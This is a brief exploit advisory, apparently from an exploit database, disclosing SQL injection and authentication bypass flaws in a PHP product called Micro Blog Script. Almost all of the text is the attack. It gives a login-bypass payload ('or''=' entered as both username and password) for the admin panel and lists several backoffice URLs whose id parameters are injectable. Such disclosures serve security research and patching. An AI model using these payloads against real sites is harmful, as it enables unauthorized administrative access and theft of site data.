# # # # # # Vulnerability: SQL Injection + Authentication Bypass # Date: 18.01.2017 # Vendor Homepage: http://www.scriptgiant.com/ # Tested on: http://www.microblogscript.scriptgiant.in # Script Name: Micro Blog Script # Author: Ihsan Sencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # Authentication Bypass : # http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter. # SQL Injection/Exploit : # http://localhost/[PATH]/backoffice/security.php?act=edit_cat&id=[SQL] # http://localhost/[PATH]/backoffice/blog_category.php?act=edit_cat&blog_category_id=[SQL] # http://localhost/[PATH]/backoffice/photo.php?act=edit_cat&photo_id=[SQL] # http://localhost/[PATH]/backoffice/video.php?act=edit_cat&video_id=[SQL] # http://localhost/[PATH]/backoffice/banner_list.php?act=edit_cat&banner_id=[SQL] # E.t.c.... Other files, too. SQL There are security vulnerabilities. # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-01-21]